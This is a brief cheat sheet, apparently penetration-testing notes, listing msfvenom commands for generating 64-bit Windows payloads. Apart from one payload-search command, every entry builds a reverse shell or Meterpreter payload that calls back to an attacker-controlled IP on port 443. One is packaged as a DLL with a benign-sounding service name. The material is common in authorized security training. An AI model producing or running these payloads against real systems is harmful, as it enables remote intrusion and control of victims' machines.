3. MSFVenom


Search for payload:

msfvenom -l payloads --platform windows --arch x64

Non-staged 64-bit Windows Reverse TCP Payload:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe

Non-staged 64-bit Windows Reverse HTTPS Payload:

sudo msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.45.199 LPORT=443 -f exe -o met.exe

64-bit DLL Payload:

sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.226 LPORT=443 -a x64 --platform Windows -f dll -o EnterpriseServiceOptional.dll